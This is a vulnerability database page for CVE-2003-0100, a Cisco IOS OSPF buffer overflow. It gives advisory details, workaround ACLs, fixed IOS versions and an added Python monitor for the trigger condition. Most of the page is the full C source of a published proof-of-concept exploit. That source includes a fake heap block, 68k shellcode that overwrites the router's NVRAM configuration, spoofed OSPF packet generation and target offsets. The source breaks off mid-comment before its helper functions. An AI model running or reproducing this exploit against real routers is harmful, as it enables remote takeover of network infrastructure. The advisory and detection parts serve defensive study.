CVE-2003-0100
CVSS 7.5
Published: 2003-03-03 00:00:00
Revised: 2016-10-17 22:29:29
NMCOE

[Original] Buffer overflow in Cisco IOS 11.2.x to 12.0.x allows remote attackers to cause a denial of service and possibly execute commands via a large number of OSPF neighbor announcements.


[CNNVD] Cisco IOS OSPF remote buffer overflow vulnerability (CNNVD-200303-026)

        Internet Operating System (IOS) is the operating system used on Cisco routers.
        Cisco IOS contains a buffer overflow in its handling of malformed OSPF packets; a remote attacker may be able to exploit it to execute malicious commands on the device or to mount a denial-of-service attack.
        When the OSPF implementation in some Cisco IOS versions receives announcements for more than 255 OSPF neighbors on a single interface, an IO memory structure is corrupted. FX of Phenoelit has published a program that exploits this vulnerability to execute code on the router.
        Cisco bug CSCdp58462 describes this vulnerability in detail.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)


- OVAL (technical details for detection)

oval:org.mitre.oval:def:5565 Cisco IOS OSPF Buffer Overflow Vulnerability
*OVAL describes in detail how to detect this vulnerability; see the related OVAL definition for further technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0100
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0100
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-026
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=104576100719090&w=2
(UNKNOWN)  BUGTRAQ  20030220 Cisco IOS OSPF exploit
http://marc.info/?l=bugtraq&m=104587206702715&w=2
(UNKNOWN)  BUGTRAQ  20030221 Re: Cisco IOS OSPF exploit
http://www.iss.net/security_center/static/11373.php
(VENDOR_ADVISORY)  XF  cisco-ios-ospf-bo(11373)
http://www.securityfocus.com/bid/6895
(UNKNOWN)  BID  6895

- Vulnerability information

Cisco IOS OSPF remote buffer overflow vulnerability
High risk  Boundary condition error
2003-03-03 00:00:00 2005-05-13 00:00:00
Remote

- Advisory and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Configure OSPF MD5 authentication on the router.
        * Configure access control so that only the expected OSPF neighbors are allowed:
        access-list 100 permit ospf host a.b.c.x host 224.0.0.5
        access-list 100 permit ospf host a.b.c.x host interface_ip
        access-list 100 permit ospf host a.b.c.y host 224.0.0.5
        access-list 100 permit ospf host a.b.c.y host interface_ip
        access-list 100 permit ospf host a.b.c.z host 224.0.0.5
        access-list 100 permit ospf host a.b.c.z host interface_ip
        access-list 100 permit ospf any host 224.0.0.6
        access-list 100 deny ospf any any
        access-list 100 permit ip any any
        Vendor patch:
        Cisco
        -----
        Cisco IOS versions 11.1 - 12.0 are affected; Cisco has fixed this vulnerability in the following IOS versions:
        12.0(19)S
        12.0(19)ST
        12.1(1)
        12.1(1)DB
        12.1(1)DC
        12.1(1)T
        and later versions.

        http://www.cisco.com/warp/public/707/advisory.html
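As a defender-side illustration of the trigger condition (more than 255 distinct OSPF neighbors announced on one interface) together with the two workarounds above (MD5 authentication and a neighbor ACL), here is an added Python monitor that is not part of the CNNVD record or of the PoC. It parses constructed raw OSPFv2 packets (the IP payload) rather than live traffic; the 64-neighbor warning threshold, the interface names and the 10.0.0.0/16 router IDs are assumptions made for the example.

```python
"""Monitor for the condition behind CVE-2003-0100 (many distinct OSPF neighbours on
one interface) and for the two CNNVD workarounds (MD5 auth, permitted-neighbour list).
Added example, not part of the CNNVD record or the PoC; parses constructed OSPFv2 packets."""
import struct
from collections import defaultdict

# 24-byte OSPFv2 header (same layout as the PoC's ospf_header_t):
# version, type, length, router id, area id, checksum, autype, auth data
OSPF_HDR = struct.Struct("!BBH4s4sHH8s")
OSPF_HELLO = 1
AUTH_NULL, AUTH_SIMPLE, AUTH_MD5 = 0, 1, 2
NEIGHBOR_LIMIT = 255   # per-interface count at which affected IOS corrupts IO memory
WARN_AT = 64           # assumed policy: warn well before the limit


def ospf_checksum(pkt: bytes) -> int:
    """RFC 2328 D.4.1: one's-complement sum over the packet with the checksum
    field zeroed and the 64-bit authentication field excluded."""
    body = pkt[:12] + b"\x00\x00" + pkt[14:16] + pkt[24:]
    if len(body) % 2:
        body += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(body) // 2), body))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_header(pkt: bytes) -> dict:
    """Decode the OSPFv2 header; raises ValueError on a truncated or odd packet."""
    if len(pkt) < OSPF_HDR.size:
        raise ValueError("short OSPF packet")
    ver, typ, length, rid, area, cks, autype, auth = OSPF_HDR.unpack_from(pkt)
    if ver != 2 or length < OSPF_HDR.size or length > len(pkt):
        raise ValueError("bad version or length")
    return {"type": typ, "length": length, "checksum": cks, "autype": autype,
            "router_id": ".".join(str(b) for b in rid),
            "area": ".".join(str(b) for b in area)}


def checksum_ok(pkt: bytes, hdr: dict) -> bool:
    if hdr["autype"] == AUTH_MD5:      # checksum field unused with crypto auth (D.4.3)
        return True
    return ospf_checksum(pkt[:hdr["length"]]) == hdr["checksum"]


class OspfNeighborMonitor:
    """Tracks distinct Hello senders per interface; alerts are plain strings."""

    def __init__(self, require_md5=True, allowed=None, warn_at=WARN_AT):
        self.require_md5 = require_md5
        self.allowed = set(allowed or [])   # router IDs the ACL permits, if known
        self.warn_at = warn_at
        self.neighbors = defaultdict(set)   # interface -> router IDs seen in Hellos
        self.alerts = []

    def observe(self, iface: str, pkt: bytes) -> list:
        """Feed one OSPF packet received on iface; returns the alerts it raised."""
        new = []
        try:
            hdr = parse_header(pkt)
        except ValueError as err:
            new.append(f"{iface}: malformed OSPF packet ({err})")
            self.alerts += new
            return new
        rid = hdr["router_id"]
        if self.require_md5 and hdr["autype"] != AUTH_MD5:
            new.append(f"{iface}: unauthenticated OSPF from {rid} (autype={hdr['autype']})")
        if not checksum_ok(pkt, hdr):
            new.append(f"{iface}: bad OSPF checksum from {rid}")
        if self.allowed and rid not in self.allowed:
            new.append(f"{iface}: OSPF from {rid}, which is not a permitted neighbour")
        if hdr["type"] == OSPF_HELLO and rid not in self.neighbors[iface]:
            self.neighbors[iface].add(rid)
            n = len(self.neighbors[iface])
            if n >= NEIGHBOR_LIMIT:
                new.append(f"{iface}: {n} distinct OSPF neighbours, at/over the "
                           f"{NEIGHBOR_LIMIT} that triggers CVE-2003-0100")
            elif n == self.warn_at:
                new.append(f"{iface}: {n} distinct OSPF neighbours (warning threshold)")
        self.alerts += new
        return new


def make_hello(router_id: str, autype: int = AUTH_NULL, area: str = "0.0.0.0") -> bytes:
    """Constructed sample: minimal Hello (no neighbour list) with a valid checksum."""
    body = struct.pack("!4sHBB4s4s4s", bytes([255, 255, 255, 0]), 10, 0x02, 1,
                       (40).to_bytes(4, "big"), b"\0" * 4, b"\0" * 4)
    rid = bytes(int(x) for x in router_id.split("."))
    ar = bytes(int(x) for x in area.split("."))
    pkt = OSPF_HDR.pack(2, OSPF_HELLO, OSPF_HDR.size + len(body),
                        rid, ar, 0, autype, b"\0" * 8) + body
    if autype != AUTH_MD5:
        pkt = pkt[:12] + struct.pack("!H", ospf_checksum(pkt)) + pkt[14:]
    return pkt


def simulate(n: int, autype: int = AUTH_NULL, require_md5: bool = False,
             iface: str = "Ethernet0") -> OspfNeighborMonitor:
    """Replay n constructed Hellos from distinct router IDs in 10.0.0.0/16 (assumed)."""
    mon = OspfNeighborMonitor(require_md5=require_md5)
    for i in range(1, n + 1):
        mon.observe(iface, make_hello(f"10.0.{i >> 8}.{i & 0xFF}", autype))
    return mon
```

Running simulate(256).alerts shows the warning at 64 neighbours and the limit alerts at 255 and 256, which is the pattern a NetFlow or SPAN-fed collector would want to page on.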

- Vulnerability information (22271)

Cisco IOS 11/12 OSPF Neighbor Buffer Overflow Vulnerability (EDBID:22271)
hardware remote
2003-02-20 Verified
0 FX
N/A
source: http://www.securityfocus.com/bid/6895/info

Cisco IOS is prone to a remotely exploitable buffer overflow condition when handling malformed OSPF (Open Shortest Path First) packets. The overflow occurs when more than 255 OSPF neighbors are announced. This may make it possible to execute malicious instructions on a device running a vulnerable version of the software. Denial of service is also possible.

/* Cisco IOS IO memory exploit prove of concept 
 * by FX of Phenoelit <fx@phenoelit.de>
 * http://www.phenoelit.de
 *
 * For: 
 * 	19C3 Chaos Communication Congress 2002 / Berlin
 * 	BlackHat Briefings Seattle 2003
 * 
 * Cisco IOS 11.2.x to 12.0.x OSPF neighbor overflow
 * Cisco Bug CSCdp58462 causes more than 255 OSPF neighbors to overflow a IO memory
 * structure (small buffer header). The attached program is a PoC to exploit 
 * this vulnerability by executing "shell code" on the router and write the 
 * attached configuration into NVRAM to basicaly own the router. 
 *
 * Example:
 * linux# gcc -o OoopSPF OoopSPF.c 
 * linux# ./OoopSPF -s 172.16.0.0 -n 255.255.0.0 -d 172.16.1.4 \
 * 	-f ./small.config -t 0 -a 1.2.3.4 -vv
 *
 * You can see if it worked if a) the router does not crash and b) the output of 
 * "show mem io" looks like this:
 * E40E38      264 E40D04   E40F6C     1                  31632D8   *Packet Data*
 * E40F6C      264 E40E38   E410A0     1                  31632D8   *Packet Data*
 * E410A0      264 E40F6C   E411D4     1                  31632D8   *Packet Data*
 * E411D4  1830400 E410A0   0          0  0       E411F8  808A8B8C  [PHENOELIT]
 *
 * Exploit has to be "triggered". In LAB environment, go to the router and say
 * box# conf t
 * box(config)# buffers small perm 0
 *
 * Greets go to the Phenoelit members, the usual suspects Halvar, Johnny Cyberpunk,
 *   Svoern, Scusi, Pandzilla, and Dizzy, to the #phenoelit people,
 *   Gaus of PSIRT, Nico of Securite.org and Dan Kaminsky.
 *
 * $Id: OoopSPF.c,v 1.4 2003/02/20 16:38:30 root Exp root $
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <errno.h>
#include <time.h>

#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>

#define IPTTL			0x80
#define BLABLA			"Phenoelit OoopSPF\n" \
				" Cisco IOS OSPF remote exploit (11.2.-12.0)\n" \
				" (C) 2002/2003 - FX of Phenoelit <fx@phenoelit.de>\n" 
#define IPPROTO_OSPF    0x59
#define IP_ADDR_LEN     4
typedef struct {
        u_int8_t        ihl:4,          /* header length */
                        version:4;      /* version */
        u_int8_t        tos;            /* type of service */
        u_int16_t       tot_len;        /* total length */
        u_int16_t       id;             /* identification */
        u_int16_t       off;            /* fragment offset field */
        u_int8_t        ttl;            /* time to live */
        u_int8_t        protocol;       /* protocol */
        u_int16_t       check;          /* checksum */
        struct in_addr  saddr;
        struct in_addr  daddr;          /* source and dest address */
} iphdr_t;

typedef struct {
    u_int8_t    version                 __attribute__ ((packed));
    u_int8_t    type                    __attribute__ ((packed));
    u_int16_t   length                  __attribute__ ((packed));
    u_int8_t    source[4]               __attribute__ ((packed));
    u_int8_t    area[4]                 __attribute__ ((packed));
    u_int16_t   checksum                __attribute__ ((packed));
    u_int16_t   authtype                __attribute__ ((packed));
    u_int8_t    authdata[8]             __attribute__ ((packed));
} ospf_header_t;

typedef struct {
    u_int8_t    netmask[4]              __attribute__ ((packed));
    u_int16_t   hello_interval          __attribute__ ((packed));
    u_int8_t    options                 __attribute__ ((packed));
    u_int8_t    priority                __attribute__ ((packed));
    u_int8_t    dead_interval[4]        __attribute__ ((packed));
    u_int8_t    designated[4]           __attribute__ ((packed));
    u_int8_t    backup[4]               __attribute__ ((packed));
} ospf_hello_t;


//
// Target definitions 
//

typedef struct {
    char	*description;
    int		n_neig;
    int		data_start;
    u_int32_t	blockbegin;
    u_int32_t	prev;
    u_int32_t	nop_sleet;
    u_int32_t	stack_address;
    u_int32_t	iomem_end;
} targets_t;

targets_t	targets[] = {
    { // #0 Phenoelit labs 2503 
	"2503, 11.3(11b) IP only [c2500-i-l.113-11b.bin], 14336K/2048K (working)",
	256,		// # of neighbor announcements 
	0xe5, 		// data start
	0xE411D4,	// block begin
	0xE410B4,	// PREV
	6,		// nop_sleet after FAKE BLOCK
	0x079B48,	// Check heaps stack PC
	0x00FFFFFF	// IO mem end
    },
    { // #1 Phenoelit labs 2501 
	"2501, 11.3(11a) IP only [c2500-i-l.113-11a.bin], 14336K/2048K (working)",
	256,		// # of neighbor announcements 
	0xe5, 		// data start
	0x00E31EA4,	// block begin
	0x00E31D84,	// PREV
	6,		// nop_sleet after FAKE BLOCK
	0x00079918,	// Check heaps stack PC (using IOStack.pl)
	0x00FFFFFF	// IO mem end
    }
};

#define TARGETS (sizeof(targets)/sizeof(targets_t)-1)

//
// NVRAM header structure
//

typedef struct {
    u_int16_t   magic                   __attribute__((packed));
    u_int16_t   one                     __attribute__((packed));
    u_int16_t   checksum                __attribute__((packed));
    u_int16_t   IOSver                  __attribute__((packed));
    u_int32_t   unknown                 __attribute__((packed));
    u_int32_t   ptr                     __attribute__((packed));
    u_int32_t   size                    __attribute__((packed));
} nvheader_t;

//
// FAKE BLOCK definitions
//

typedef struct {
    u_int32_t	redzone		__attribute__((packed));
    u_int32_t	magic		__attribute__((packed));
    u_int32_t	pid		__attribute__((packed));
    u_int32_t	proc		__attribute__((packed));
    u_int32_t	name		__attribute__((packed));
    u_int32_t	pc		__attribute__((packed));
    u_int32_t	next		__attribute__((packed));
    u_int32_t	prev		__attribute__((packed));
    u_int32_t	size		__attribute__((packed));
    u_int32_t	refcnt		__attribute__((packed));
    u_int32_t	pad1		__attribute__((packed));
    u_int32_t	freemagic	__attribute__((packed));
    u_int32_t	lastdealloc	__attribute__((packed));
    u_int32_t	pad2		__attribute__((packed));
    u_int32_t	pad3		__attribute__((packed));
    u_int32_t	free_next	__attribute__((packed));
    u_int32_t	free_prev	__attribute__((packed));
} block_t;

char		fakeblock[] =
        "\xFD\x01\x10\xDF"      // RED
        "\xAB\x12\x34\xCD"      // MAGIC
        "\xFF\xFF\xFF\xFF"      // PID
        "\x80\x81\x82\x83"      // PROC
        "\x00\xE4\x12\x00"      // NAME	(Message)
        "\x80\x8a\x8b\x8c"      // PC
	"\x00\x00\x00\x00"      // NEXT (no following block)
        "\x00\xE4\x10\xB4"      // PREV (correct for 0xE411d4)
	"\x00\x0D\xF7\x02"      // Size CORRECT for 0xE411D4
        "\x00\x00\x00\x00"      // Reference count
        "\x00\x00\x00\x00"      // PADDING
        "\xDE\xAD\xBE\xEF"      // FREE MAGIC
	"[PHE"			// last delocator
	"NOEL"			// PADDING
	"IT]\x00"		// PADDING
	"\x00\xE4\x12\x20"	// FREE NEXT in our block
	"\x00\x07\x9B\x48"	// FREE PREV (Check heaps stack PC)
	;
block_t		*bpatch = (block_t*)fakeblock;

//
// Cisco code for M68030 CPU and 2500 NVRAM layout
//
char		ccode[] =
        "\x46\xFC\x27\x00"              //movew #9984,%sr (0x00E41220)
        "\x43\xFA\x00\x48"              //lea %pc@(4e <config>),%a1 (0x00E41224)
        "\x24\x7C\x02\x00\x00\x06"      //moveal #33554438,%a2 (0x00E41228)
        "\xB3\x81"                      //eorl %d1,%d1 (0x00E4122E)
        "\x74\x01"                      //moveq #1,%d2 (0x00E41230)
        "\x22\x3C\x01\x01\x01\x01"      //movel #16843009,%d1 (0x00E41232)
        "\x14\xD9"                      //moveb %a1@+,%a2@+ (0x00E41238)
        "\x32\x3C\xFF\xFF"              //movew #-1,%d1 (0x00E4123A)
        "\x93\x42"                      //subxw %d2,%d1 (0x00E4123E)
        "\x6B\x00\xFF\xFC"              //bmiw 1e <write_delay> (0x00E41240)
        "\x0C\x91\xCA\xFE\xF0\x0D"      //cmpil #-889262067,%a1@ (0x00E41244)
        "\x66\x00\xFF\xEC"              //bnew 18 <copy_config> (0x00E4124A)
        "\x14\xFC\x00\x00"              //moveb #0,%a2@+ (0x00E4124E)
        "\x32\x3C\xFF\xFF"              //movew #-1,%d1 (0x00E41252)
        "\x93\x42"                      //subxw %d2,%d1 (0x00E41256)
        "\x6B\x00\xFF\xFC"              //bmiw 36 <write_delay2> (0x00E41258)
        "\xB5\xFC\x02\x00\x07\x00"      //cmpal #33556224,%a2 (0x00E4125C)
        "\x6D\x00\xFF\xEA"              //bltw 2e <delete_config> (0x00E41262)
        "\x22\x7C\x03\x00\x00\x60"      //moveal #50331744,%a1 (0x00E41266)
        "\x4E\xD1"                      //jmp %a1@ (0x00E4126C)

    ;

char		terminator[]	= "\xCA\xFE\xF0\x0D";
char		nop[] 		= "\x4E\x71";

//
// Global variables to pass the current buffer location to the 
// OSPF packet generator function
//
int 		payloadc=0;
char		*payload=NULL;
// packet counter (global)
unsigned int 	pc=0;


//
// Configuration
//
struct {
    int			verbose;
    char		*device;
    struct in_addr	*target;
    u_int32_t		src_net;
    u_int32_t		src_mask;
    u_int32_t		area;
    int			directed;
    int			test_only;

    // fake block constants
    int			n_neig;
    int			data_start;
    u_int32_t		blockbegin;
    u_int32_t		prev;
    u_int32_t		nop_sleet;
    u_int32_t		stack_address;
    u_int32_t		iomem_end;

    // other stuff 
    char		*filename;
    int			target_sel;
} cfg;


u_char	*construct_ospf(struct in_addr *dd, struct in_addr *src,
	u_int16_t autosys, int *psize);
int	init_socket_IP4(int broadcast);
int     sendpack_IP4(int sfd, u_char *packet,int plength);
u_int16_t chksum(u_char *data, unsigned long count);
void    *smalloc(size_t size);
void	hexdump(unsigned char *bp, unsigned int length);
void	usage(char *s);

int main(int argc, char **argv) {
    char	option;
    extern char	*optarg;
    int		sfd;

    unsigned int	i=0;
    u_int32_t		countip=20;

    /* confg file */
    int                 fd;
    struct stat         sb;

    u_char              *buffer;
    u_char              *p;
    nvheader_t          *nvh;
    unsigned int        len;
    u_int16_t           cs1;
    
    // final overflow
    char		*overflow;
    int			osize=0;

    
    printf(BLABLA);

    memset(&cfg,0,sizeof(cfg));
    while ((option=getopt(argc,argv,"vDTd:s:n:L:F:f:t:S:a:"))!=EOF) {
	switch (option) {
	    case 'v':	cfg.verbose++;
			break;
	    case 'D':	cfg.directed++;
			break;
	    case 'T':	cfg.test_only++;
			break;
	    case 'd':	cfg.target=(struct in_addr *)smalloc(sizeof(struct in_addr));
			if (inet_aton(optarg,cfg.target)==0) {
			    fprintf(stderr,"Your destination is bullshit\n");
			    return (1);
			}
			break;
	    case 's':	if (inet_aton(optarg,(struct in_addr*)&(cfg.src_net))==0) {
			    fprintf(stderr,"Your source net is wrong\n");
			    return (1);
			}
			break;
	    case 'n':	if (inet_aton(optarg,(struct in_addr*)&(cfg.src_mask))==0) {
			    fprintf(stderr,"Your source mask is wrong\n");
			    return (1);
			}
			break;
	    case 'L':	cfg.n_neig=(unsigned int)strtoul(optarg,(char **)NULL,10);
			break;
	    case 'F':	cfg.data_start=(unsigned int)strtoul(optarg,(char **)NULL,16);
			break;
	    case 'f':	cfg.filename=(char *)smalloc(strlen(optarg)+1);
			strcpy(cfg.filename,optarg);
			break;
	    case 't':	cfg.target_sel=(unsigned int)strtoul(optarg,(char **)NULL,10);
			if (cfg.target_sel>TARGETS) {
			    fprintf(stderr,"Target number unknown\n");
			    return (1);
			}
			break;
	    case 'S':	cfg.nop_sleet=(unsigned int)strtoul(optarg,(char **)NULL,10);
			break;
	    case 'a':	if (inet_aton(optarg,(struct in_addr*)&(cfg.area))==0) {
			    fprintf(stderr,"Your area doesn't make sense.\n");
			    return (1);
			}
			break;
	    default:	usage(argv[0]);
	}
    }

    if (cfg.target_sel>TARGETS) {
	fprintf(stderr,"Error: user too stupid (check -t)\n");
	return (-1);
    }
    if (cfg.n_neig==0) cfg.n_neig=targets[cfg.target_sel].n_neig;
    if (cfg.data_start==0) cfg.data_start=targets[cfg.target_sel].data_start;
    if (cfg.blockbegin==0) cfg.blockbegin=targets[cfg.target_sel].blockbegin;
    if (cfg.prev==0) cfg.prev=targets[cfg.target_sel].prev;
    if (cfg.nop_sleet==0) cfg.nop_sleet=targets[cfg.target_sel].nop_sleet;
    if (cfg.stack_address==0) cfg.stack_address=targets[cfg.target_sel].stack_address;
    if (cfg.iomem_end==0) cfg.iomem_end=targets[cfg.target_sel].iomem_end;

    //
    // Check the parameters and set up a socket
    //
    cfg.src_net=cfg.src_net&cfg.src_mask;

    if ( (cfg.src_net==0)||(cfg.src_mask==0)
	    ||(cfg.filename==NULL)||(cfg.target==NULL)) {
	usage(argv[0]);
    }

    if ((sfd=init_socket_IP4(1))<1) {
	fprintf(stderr,"Could not get a socket for you\n");
	return (-1);
    }

    //
    // Get some info back to the user if he requested verbose
    //
    if (cfg.verbose) {
	if (cfg.directed) 
	    printf("\twith unicast target %s\n",inet_ntoa(*cfg.target));
	else 
	    printf("\twith default destination addresses\n");
	printf("\twith source network %s/",
		inet_ntoa(*(struct in_addr*)&(cfg.src_net)));
	printf("%s\n",inet_ntoa(*(struct in_addr*)&(cfg.src_mask)));
        printf("Using Target: %s\n",targets[cfg.target_sel].description);
	printf( "\t# of neighbors: %u\n"
		"\tdata start    : %u\n"
		"\tBlock address : 0x%08X\n"
		"\tPREV pointer  : 0x%08X\n"
		"\tNOP sleet     : %u\n"
		"\tStack address : 0x%08X\n"
		"\tIO Memory end : 0x%08X\n",
		cfg.n_neig,cfg.data_start,cfg.blockbegin,cfg.prev,
		cfg.nop_sleet,cfg.stack_address,cfg.iomem_end);
    }

    //
    // Patch the fake block with the new values
    //
    bpatch->prev=htonl(cfg.prev);
    bpatch->size=htonl(
	    (cfg.iomem_end
	    -39 // minus block header in bytes - 1
	    -cfg.blockbegin) / 2);
    bpatch->free_next=htonl(cfg.blockbegin+sizeof(fakeblock)-5/* RED ZONE */
	    +((sizeof(nop)-1)*cfg.nop_sleet));
    bpatch->free_prev=htonl(cfg.stack_address);
    bpatch->name=htonl(cfg.blockbegin+44);

    /* 
     * Load Config
     * - load into buffer
     * - prepare NVRAM header
     * - calculate checksum
     * -> *buffer contains payload
     */
    if (cfg.filename==NULL) return (-1);
    if (stat(cfg.filename,&sb)!=0) {
        fprintf(stderr,"Could not stat() file %s\n",cfg.filename);
        return (-1);
    }

    if ((fd=open(cfg.filename,O_RDONLY))<0) {
        fprintf(stderr,"Could not open() file %s\n",cfg.filename);
        return (-1);
    }

    len=sb.st_size;
    if ((buffer=(char *)malloc(len+sizeof(nvheader_t)+10))==NULL) {
        fprintf(stderr,"Malloc() failed\n");
        return (-1);
    }
    memset(buffer,0,len+sizeof(nvheader_t)+10);

    p=buffer+sizeof(nvheader_t);
    if (cfg.verbose) printf("%d bytes config read\n",read(fd,p,len));
    close(fd);

    // pad config so it is word bound for the 0xcafef00d test
    if ((len%2)!=0) {
	strcat(p,"\x0A");
	len++;
	if (cfg.verbose) printf("Padding config by one\n");
    }

    nvh=(nvheader_t *)buffer;
    nvh->magic=htons(0xABCD);		
    nvh->one=htons(0x0001);		// is always one 
    nvh->IOSver=htons(0x0B03);		// IOS version
    nvh->unknown=htonl(0x00000014);	// something, 0x14 just works
    nvh->ptr=htonl(0x000D199F);		// config end ptr 
    nvh->size=htonl(len);

    cs1=chksum(buffer,len+sizeof(nvheader_t)+2);
    if (cfg.verbose) printf("Checksum: %04X\n",htons(cs1));
    nvh->checksum=cs1;

    //
    // Put the overflow together
    //
    // (1) calculate size of the whole thing
    osize=sizeof(fakeblock)-1+
	  (cfg.nop_sleet * (sizeof(nop)-1))+
	  sizeof(ccode)-1+
	  sizeof(nvheader_t)+
	  len+
	  sizeof(terminator)-1;
    if ((osize/4)>cfg.data_start) {
	fprintf(stderr,"ERROR: The whole thing is too large!\n");
	return (-1);
    } else {
	printf("Using %u out of %u bytes (overflow: %u bytes)\n",
		osize,cfg.data_start*4,cfg.n_neig*4);
    }
    //
    // adjust osize ot be 4byte bound
    //
    if ((osize%4!=0)) osize+=osize%4;
    overflow=smalloc(osize);

    //
    // (2) copy the fakeblock in the buffer
    //
    memcpy(overflow,fakeblock,sizeof(fakeblock)-1);
    p=(void *)overflow+sizeof(fakeblock)-1;

    //
    // (3) Add NOPs to the buffer
    //
    for (i=0;i<cfg.nop_sleet;i++) {
	memcpy(p,nop,sizeof(nop)-1);
	p+=sizeof(nop)-1;
    }

    //
    // (4) Add the ccode
    //
    memcpy(p,ccode,sizeof(ccode)-1);
    p+=sizeof(ccode)-1;

    //
    // (5) Add the NVRAM structure and config
    //
    memcpy(p,buffer,len+sizeof(nvheader_t));
    p+=len+sizeof(nvheader_t);

    //
    // (6) finish off with terminator
    //
    memcpy(p,terminator,sizeof(terminator)-1);

    if (cfg.verbose>1) hexdump(overflow,osize);
    if (cfg.test_only) return (0);

    payload=overflow+(osize-4);
    payloadc=osize;

    // *************************
    // PERFORM THE OVERFLOW
    // *************************
    for (i=0;i<cfg.n_neig;i++) {
	u_char		*pack;
	int		plen;
	u_int32_t	uip;

OwnHostException:
	countip++;
	uip=htonl(countip);
	uip=uip&(~cfg.src_mask);
	uip=uip|cfg.src_net;

	if (!memcmp(&uip,cfg.target,IP_ADDR_LEN)) {
	    if (cfg.verbose>2) 
		printf("-- Skipping %s\n",inet_ntoa(*(cfg.target)));
	    else {
		printf("*"); fflush(stdout);
	    }
	    goto OwnHostException;
	}

	if (cfg.verbose>2)
	    printf("\tsending from %15s... ",inet_ntoa(*(struct in_addr*)&(uip)));
	else {
	    printf("."); fflush(stdout);
	}

	// Make and send OSPF
	pack=construct_ospf(cfg.target,
		(struct in_addr *)&uip,0,&plen);
	sendpack_IP4(sfd,pack,plen);
	free(pack);

	if (cfg.verbose>2) printf("\n");
	usleep(1);
    }

    close(sfd);
    printf("\n");

    return 0;
}

u_char	*construct_ospf(struct in_addr *dd, struct in_addr *src,
	u_int16_t autosys, int *psize) {
    u_char			*tpacket;
    iphdr_t			*iph;
    u_int16_t			cs;		/* checksum */
    char			all_ospf[]="224.0.0.5";
    ospf_header_t       	*ospfh;
    ospf_hello_t        	*ohelo;

    *psize=sizeof(iphdr_t)+sizeof(ospf_header_t)+sizeof(ospf_hello_t);
    tpacket=(u_char *)smalloc(*psize
	    +3 /* for my checksum function, which sometimes 
		  steps over the mark */
	    );

    // IP packet
    iph=(iphdr_t *)tpacket;

    iph->version=4;
    iph->ihl=sizeof(iphdr_t)/4;

    iph->tot_len=htons(*psize);
    iph->ttl=IPTTL;
    iph->protocol=IPPROTO_OSPF;

    memcpy(&(iph->saddr.s_addr),&(src->s_addr),IP_ADDR_LEN);
    if (!cfg.directed)
	inet_aton(all_ospf,(struct in_addr *)&(iph->daddr));
    else
	memcpy(&(iph->daddr.s_addr),&(dd->s_addr),IP_ADDR_LEN);

    // OSPF header
    ospfh=(ospf_header_t *)((void *)tpacket+sizeof(iphdr_t));
    ohelo=(ospf_hello_t *)((void *)tpacket+sizeof(iphdr_t)+sizeof(ospf_header_t));
    ospfh->version=2;
    ospfh->type=1;
    ospfh->length=htons(sizeof(ospf_header_t)+sizeof(ospf_hello_t));
    memcpy(&(ospfh->area),&(cfg.area),4);

    // Increment the packets sent
    pc++;

    // 
    // If we are in the range of the whole overflow thingy, copy the appropriate
    // 4 bytes into the source address in the OSPF header
    //
    if ( (pc <= cfg.data_start) && 
	      (pc > cfg.data_start-(payloadc/4) ) ) {
	memcpy(&(ospfh->source),payload,IP_ADDR_LEN);
	payload-=4;
    }
    // 
    // well, we are not in there, so we set it to some value
    //
    else {
	ospfh->source[0]=0xCA;
	ospfh->source[1]=0xFE;
	ospfh->source[2]=0xBA;
	ospfh->source[3]=0xBE;
    }

    // be verbose
    if (cfg.verbose>2) printf(" [0x%08X] ",ntohl(*((unsigned int*)&(ospfh->source))));

    // compile the rest of the packet
    memcpy(&(ohelo->netmask),&(cfg.src_mask),4);
    ohelo->hello_interval=htons(10);
    ohelo->options=0x2;
    ohelo->priority=2;
    ohelo->dead_interval[3]=40;
    memcpy(&(ohelo->designated),&(src->s_addr),IP_ADDR_LEN);

    cs=chksum((u_char *)ospfh,sizeof(ospf_header_t)+sizeof(ospf_hello_t));
    ospfh->checksum=cs;

    return tpacket;
}

// Dirty stuff from IRPAS
int init_socket_IP4(int broadcast) {
    int                 sfd;
    int			t=1;

    if ((sfd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) {
        perror("socket()");
        return(-1);
    }

    /* make a broadcast enabled socket if desired */
    if (broadcast) {
        if (setsockopt(
                    sfd,SOL_SOCKET,SO_BROADCAST,
                    (void *)&t,sizeof(int)) != 0) {
            perror("setsockopt");
            return (-1);
        }
    }
    return sfd;
}

int     sendpack_IP4(int sfd, u_char *packet,int plength) {
    struct sockaddr_in  sin;
    iphdr_t             *iph;

    iph=(iphdr_t *)packet;

    memset(&sin,0,sizeof(struct sockaddr_in));
    sin.sin_family=AF_INET;
    sin.sin_port=htons(0);
    memcpy(&(sin.sin_addr),&(iph->daddr),sizeof(sin.sin_addr));

    if (sendto(sfd,packet,plength,0,
                (struct sockaddr *) &sin,
                sizeof(struct sockaddr_in)) <=0) {
        perror("sendto()");
        return(-1);
    }

    return 0;
}


u_int16_t chksum(u_char *data, unsigned long count) {
    u_int32_t           sum = 0;
    u_int16_t           *wrd;

    wrd=(u_int16_t *)data;
    while( count > 1 )  {
        sum = sum + *wrd;
        wrd++;
        count -= 2;
    }

    if( count > 0 ) sum = sum + ((*wrd &0xFF)<<8);
    while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
    return (~sum);
}

void    *smalloc(size_t size) {
    void        *p;

    if ((p=malloc(size))==NULL) {
        fprintf(stderr,"smalloc(): malloc failed\n");
        exit (-2);
    }
    memset(p,0,size);
    return p;
}


// /dirty 



/* A better version of hdump, from Lamont Granquist.  Modified slightly
 * by Fyodor (fyodor@DHP.com) 
